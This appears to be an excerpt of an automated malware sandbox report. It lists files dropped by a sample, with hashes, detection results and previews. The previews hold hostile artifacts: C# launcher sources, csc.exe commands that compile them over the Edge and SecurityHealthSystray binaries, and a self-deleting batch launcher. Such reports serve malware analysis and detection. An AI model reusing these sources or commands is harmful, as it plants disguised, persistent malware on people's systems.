                                                                                            SHA-512:0CD7CE092ED0C9379550FE95EE25BE50BE626A29C4C378F33BEBCE1AE50CCD8BE02BFE6DE396B6985516D655C8BC48882FC933A0713380B7A0D4EA8AB6B4AF1E
                                                                                            Malicious:false
                                                                                            Preview:L.....}g.............debug$S........X...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........Z....c:\Program Files (x86)\Microsoft\Edge\Application\CSC2AA2F9313E4148E19DA14C63DF3823B.TMP.....................q.QK.......N..........7.......C:\Users\user~1\AppData\Local\Temp\RES158C.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\agentwebreviewDhcp.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6c0, 10 symbols, created Tue Jan 7 19:26:55 2025, 1st section name ".debug$S"
                                                                                            Category:modified
                                                                                            Size (bytes):1912
                                                                                            Entropy (8bit):4.608770217971646
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Hrj69YsHoqSzd0l+ZHOwKTFtYNSlmxT0uZhN1+hBPNnqpdt4+lEbNFjMyi0+ucN:FsHo1dHZNKTcslmuul1+hzqXSfbNtmhr
                                                                                            MD5:898BE5A1A4BFB3A64E1F2ADFC9AC00F0
                                                                                            SHA1:1541DAD4B18BFA8612F049FE676D346A629D6CA1
                                                                                            SHA-256:F09E77B1F761FBA09D062859DEE9CB7AF52BD1DAA56CCFC90D156D367063C7AE
                                                                                            SHA-512:A11F4AA7FD12666613C637868E69CB96BDC39AC01B46B3ECC013471A30027D570A56410AB35B00DB14A8738993EBAAB5E17B4253D27BDA16D80C6FBC82B9D48D
                                                                                            Malicious:false
                                                                                            Preview:L.....}g.............debug$S........H...................@..B.rsrc$01................t...........@..@.rsrc$02........8...................@..@........L....c:\Users\user\AppData\Roaming\CSC2223B829CAD74E6CA36F406352D1401D.TMP................8.B.:....b.6.g...........7.......C:\Users\user~1\AppData\Local\Temp\RES1BB6.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\agentwebreviewDhcp.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...U.p.d.a.
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Tue Jan 7 19:26:56 2025, 1st section name ".debug$S"
                                                                                            Category:modified
                                                                                            Size (bytes):1956
                                                                                            Entropy (8bit):4.566460101504781
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:H1jO9/OqavnZHtYwKTFtYNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:PvvnZNKTcEluOulajfqXSfbNtmh1Z
                                                                                            MD5:CFB8481868339E9DADD3BB35CE0DCA44
                                                                                            SHA1:718A719632B324DB8D9770CB0029CF0233AD49DB
                                                                                            SHA-256:1B2D28F2A819F9BC724A22D9FDECD598AD4D0D56FB0233924A7CCC13588F4617
                                                                                            SHA-512:9F09DEED159A7CF15991250CABF23ED6A24EE2F78E1EA7D42C5FE115B27CFD8C04FD01C48708994FC16AA3421CF6E1A0A1F108AAD792238A622BA6656B3700FE
                                                                                            Malicious:false
                                                                                            Preview:L.....}g.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........=....c:\Windows\System32\CSC13E65C595E5748469989E9DEA0292D89.TMP.....................r.av..t.y..............7.......C:\Users\user~1\AppData\Local\Temp\RES1F7E.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\agentwebreviewDhcp.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Users\user\Desktop\HaLCYOFjMN.exe
                                                                                            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):550912
                                                                                            Entropy (8bit):5.301296719752463
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:sYqdc0NkzDVvlhmTIlA41IBcN3p0NIb88WsNMPaKFP3b2V122J0sL:s9J85TX4cN3CNIb88WsNMP5F1k
                                                                                            MD5:F50B390915773B882776BB3EF569C708
                                                                                            SHA1:692556BD11E9CB617A9D09D14A9B493CF67E14D4
                                                                                            SHA-256:05C3D3A5E3A6E19F6B29DB7793CAED353F4574BF3CC493082458FD4C81CA33D0
                                                                                            SHA-512:D657F1FFC6349BA5BBB62008326B586933EF3E5688FF9A21334315633B4CC957D0A763B2E69988505B73BB87488581E9FF203B6229347754C55E2D679B7AC11F
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 68%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A.n...............0.................. ........@.. ....................................@.................................t...W.......b............................................................................ ............... ..H............text....... ...................... ..`.rsrc...b...........................@..@.reloc...............f..............@..B........................H............)......E...........P .......................................................................................................................................................................D~..;...].1...!H...N.I..N...e.F..X.....V:......)..]"..fSZ.{f....PQAeS~....'^.:.k.;.E...X.....K0.U vm...v...L%....O*...5D.&b....ZI..g%...E...]/u..L...F......k._......mz.RY...-.t!.X.i)I..D..ju.yx.X>k..q.'.O...... .f..:.}.J.c.1..Q3`.S.Ebdw.k........+..HhXpE....l..{..Rs.#.K..r
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                            Category:dropped
                                                                                            Size (bytes):387
                                                                                            Entropy (8bit):4.917397551942817
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:V/DNVgtDIbSf+eBLANH9fiFkMSf+eBL6u+tiFkD:JNVQIbSfhGiFkMSfhWDkFkD
                                                                                            MD5:833AEA92819CAA4768C4CD7E508FF80D
                                                                                            SHA1:99EE9332A150499393BDBB93D21DE51887473595
                                                                                            SHA-256:C2B421ACEDD36F46BD1866CEE5DCF64C19A249138B80A8CCBE0754A5C985A75D
                                                                                            SHA-512:F262FA165701A477A5E39E1B2535D6D0DBE5959A6F61498AFDB2E5BA014C68F2A13AF9CAA4BFA639FFACC5088DF96E04F3F5B1C467B391DAF51F675C5F99693F
                                                                                            Malicious:false
                                                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Roaming\Update.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\Windows Mail\System.exe"); } catch { } }).Start();. }.}.
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):254
                                                                                            Entropy (8bit):5.067692825066608
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Hu+H2L//1xRPcNwiaZ5IwBzxsjGZxWE8ocNwi23fBPpHPn9n:Hu7L//TRLNHHcQlZH9
                                                                                            MD5:7601AFF0856EEA5188091D3D0BD0853B
                                                                                            SHA1:F86D1B357F3FE218BF163703CDC5376145A918A7
                                                                                            SHA-256:7BD1D910742075D8B31850487B1B0B943BE2E1EE4A6471BDDFA823E3571D4EA7
                                                                                            SHA-512:1CB96A24A059052BC38AC954B83482EEAA3E9D7200AC2DC12E68A08E39CB2F92FBC71BDE7411F98A0A46D1975623F527D6DFC5C3BD0B55306F397F4382FB74E3
                                                                                            Malicious:false
                                                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Users\user\AppData\Roaming\Update.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.0.cs"
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (332), with CRLF, CR line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):753
                                                                                            Entropy (8bit):5.264493827961545
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:+Xa/I/u7L//TRLNHHcQlZH4KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:j/I/un/VxtDYKax5DqBVKVrdFAMBJTH
                                                                                            MD5:58BD6C04D3088C15C9EA19211070780C
                                                                                            SHA1:8B10242DEB620244A01DA24E91C701244C2273DC
                                                                                            SHA-256:A46FF306F6B8E821B88A102C3685F328878D8986FC80AC9D6C38B60A7D070F6F
                                                                                            SHA-512:6BB4BB7838C985D17AB31048432ED8C68D56C0B7D3803136EB68F709FDE76017EDCE024B635153A3D9D407B22E2EE9E91C7C073880A6CC8854904A88F7DD1658
                                                                                            Malicious:false
                                                                                            Preview:.C:\agentwebreviewDhcp> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Users\user\AppData\Roaming\Update.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                            Category:dropped
                                                                                            Size (bytes):402
                                                                                            Entropy (8bit):4.922649339213585
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6u+tiFkD:JNVQIbSfhWLzIiFkMSfhWDkFkD
                                                                                            MD5:EF08BA6FE86E6EF1722A078FA0CF8F60
                                                                                            SHA1:1BEC3CA03E8A831AF72FEDA8B440868FDE133919
                                                                                            SHA-256:C0663F054591364D51319D2B040B9BAEDCCA03F81CBBB206D9C5BFEF625B54F9
                                                                                            SHA-512:8E19968DA2082E793E702C51706F7162D33DF6F5F0714CF819FAE84409EEA7AF60B4039520DF454A3C2F95795992D680740425834A7F8D9CB8D62E0EA4BD767E
                                                                                            Malicious:false
                                                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\Windows Mail\System.exe"); } catch { } }).Start();. }.}.
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):269
                                                                                            Entropy (8bit):5.205307289322903
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8ocNwi23f53bn:Hu7L//TRRzscQlZtb
                                                                                            MD5:065D5DB89F3B0AA87E838EBE2E900C8A
                                                                                            SHA1:EB2EDF425681A521C6ED5898EB7F1323D2DD815F
                                                                                            SHA-256:80273BA6C2616ACD5E83975F2F1472B38ECBDEB8DF27CB4F4D15105EEE359958
                                                                                            SHA-512:EBD65E7915D2298A1F1511952C70BD112F9E1C4FFD530031481689F1CE7A18332CAE65C9BD28F3AAB0B4C46B5147F8785400FC5E84F3F18B93C7581ADD7E54DA
                                                                                            Malicious:true
                                                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.0.cs"
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (347), with CRLF, CR line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):768
                                                                                            Entropy (8bit):5.2779664028590725
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:+Xa/I/u7L//TRRzscQlZtaKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:j/I/un/VRzstDtaKax5DqBVKVrdFAMBt
                                                                                            MD5:4EE248593C857B22F5EA3CE35746D298
                                                                                            SHA1:B784DFA8793C06907EAD4E818F3025A191004704
                                                                                            SHA-256:E1BB292D06442922B165F75BF195D07F168025C85E06FC4F056E025ECB6CB82B
                                                                                            SHA-512:B469796CB1EA1C250AECC48F71DA4A588B93DB78352009E495EED0E5505AD0526E039DBC30BB0630E829775DF46492C6F16C1EF24686FC7F192C20F0232F1D74
                                                                                            Malicious:false
                                                                                            Preview:.C:\agentwebreviewDhcp> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):229
                                                                                            Entropy (8bit):5.192137842300063
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:hCijTg3Nou1SV+DE1c6xCyfobKOZG1cNwi23fnv:HTg9uYDEBxLdZ/v
                                                                                            MD5:79DD8BD55E0D1E170A0BEEDA25FA236E
                                                                                            SHA1:92294343B6067682776D1E1393D66CF92481DE64
                                                                                            SHA-256:98D879AC4C0696243806F3D5A91E6F36CA11F81D07D2F331CB5AE138C9E025A5
                                                                                            SHA-512:01C219AA22A30E30B5C34D140AE0497BCF9281D84FCC6C4DA9EEE762F7CFA456C58FAB10E1769DCE1CC78E062853868FD26A6BB6E882366A1BF6CE990D06FEDE
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\jxseyegkwF.bat"
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                            Category:dropped
                                                                                            Size (bytes):387
                                                                                            Entropy (8bit):4.877714413950026
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6u+tiFkD:JNVQIbSfhV7TiFkMSfhWDkFkD
                                                                                            MD5:6D73A34B0AC7057479969B66115ABB33
                                                                                            SHA1:9814CAD735D98FB4898E745CFA043CCAB320E9A0
                                                                                            SHA-256:AD96117877C32E3574BA4BAFF669E666172AEF3CB1C26F66894A2410FEC956A2
                                                                                            SHA-512:CB035DA4961B25CFEF067823D0C519F0E89F247341F40A471346336EB9DF54F9E80C1BAB0A583E15AD9E10A53C66A59C373C45A296AC089F882BA06F7B2282F2
                                                                                            Malicious:false
                                                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\Windows Mail\System.exe"); } catch { } }).Start();. }.}.
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):254
                                                                                            Entropy (8bit):5.0844187478504885
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8ocNwi23fv:Hu7L//TRq79cQlZn
                                                                                            MD5:E45AB3BB1BEC4F9DA14C464A735430DE
                                                                                            SHA1:51D33F90BD085E0C49465EE9E89A2BBE7CB9E81D
                                                                                            SHA-256:C024624644543CF8DC2CD9BDA1FDA30BFCA35178E787C041B3B07B15ABA6DB0D
                                                                                            SHA-512:CD81CCFFC54E09DFDABCB32BA5A39CD7E397F598ABCA790776B8972DB1BE0DCBE4A096C9EC4AA00D86ADFDAA5189323DE36E0C8F5F20EF5BA439D3B0FF4BDC06
                                                                                            Malicious:false
                                                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.0.cs"
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (332), with CRLF, CR line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):753
                                                                                            Entropy (8bit):5.255342483175257
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:+Xa/I/u7L//TRq79cQlZuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:j/I/un/Vq79tDuKax5DqBVKVrdFAMBJj
                                                                                            MD5:C56B369B887DCC827D515C4CEEBFE091
                                                                                            SHA1:EC3FC22E00689D16564A3463389ACC7BB3D872CA
                                                                                            SHA-256:FCDCF21ADF0850974B172E04D441360B934A22EF7061C8F69AD29EE557E2320B
                                                                                            SHA-512:EC8F6830CFE5D65DF3F52956DFAD9297117273097DE664F6FF35A06BF1E1371120AA1987D01A3450C2750303D0ED5A6A01FB2532EC4D89C98BD09799F336BF4F
                                                                                            Malicious:false
                                                                                            Preview:.C:\agentwebreviewDhcp> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                            Process:C:\Users\user\Desktop\HaLCYOFjMN.exe
